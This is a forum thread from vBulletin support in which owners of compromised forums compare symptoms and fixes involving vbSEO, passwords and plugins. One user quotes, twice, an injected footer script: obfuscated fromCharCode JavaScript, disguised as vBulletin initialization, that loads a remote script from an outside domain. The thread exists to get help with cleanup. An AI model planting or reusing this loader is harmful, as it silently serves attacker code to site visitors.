A fix if your site is already exploited
Collapse
X
-
Yesterday, 2:03amComment
-
This is mad, I have excatly the same issue for few days now and have no idea what is causing it. Please help.Comment
-
+1 for the same exploit.
VB - any word on finding how they're doing this?
We're running VB/CMS 4.1.8 + vbSEO 3.6.0 and that's about it.Comment
-
I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/
I will fix it now, remove the malicious code and see if it's back again today or tomorrow.Comment
-
Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 APIComment
-
I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/
I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
/vbseo/includes/functions_vbseocp_abstract.php
file. So i can't apply it. Also the link to their testing utility (v3) isn't working by the looks of it.
Wayne, i'll open a support ticket if it comes back again.Comment
-
Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?
Code:[TABLE] [TR] [TD="class: webkit-line-content"] <script type="text/javascript">[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] <!--[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] // Main vBulletin Javascript Initialization[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] //-->[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] </script>[/TD] [/TR] [/TABLE]
Comment
-
Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.
I did pay $100 for the publishing suite upgrade so I could get support for this, but no one replied to my ticket and fortunately this thread was posted and the problem was solved.
I gave vBulletin full access to my server, all the passwords they could possibly need.Comment
-
Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?
Code:[TABLE] [TR] [TD="class: webkit-line-content"] <script type="text/javascript">[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] <!--[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] // Main vBulletin Javascript Initialization[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] //-->[/TD] [/TR] [TR] [TD="class: webkit-line-number"][/TD] [TD="class: webkit-line-content"] </script>[/TD] [/TR] [/TABLE]
Comment
-
If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.Comment
-
Hello,
I know that this problem has effected most versions of vBulletin
You guys are talking about the 4x version but it all sounds very similar to what happened to my forum
I am old 3x version and I am not here to tell you what the problem is or how to fix it, but
I have been in battle with a crazy redirect which has been on for about 2 weeks,
It is hard to read through all the forums and see what others have said to do and because it is a ongoing problem
there are little updated fixes
I dont know if the problem is vBulletin or vbseo (which I have installed latest version)
what fixed my problem was
1. doing a full re instal of vbseo all files
2. changed passwords to everything eg. forumcp database cpannel vbseocp and others (make sure to edit config for new passwords)
3. changing permissions to all config files forum and vbseo I had done this via ftp but after much trial and error found that this had to be done via cpanel - file manager dont know why just worked!
4. I could not get my warning message in my vbseocp to change until I did the permission change for the config file via cpanel (the message was saying that you should edit your config permissions to securer your site) once I did it removed the message.
I hope this may help someone, and I am still looking into some changes that have been mate to my database
extra tables were added, related to tags, I dont know much about these tables other than I did not create them and they were created
about the same time as I started to have problems.
You can have a look at a screen shot here if you want to see them
Like I said I have no answers and dont know the cause, but this worked for me
Regards
RyanComment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment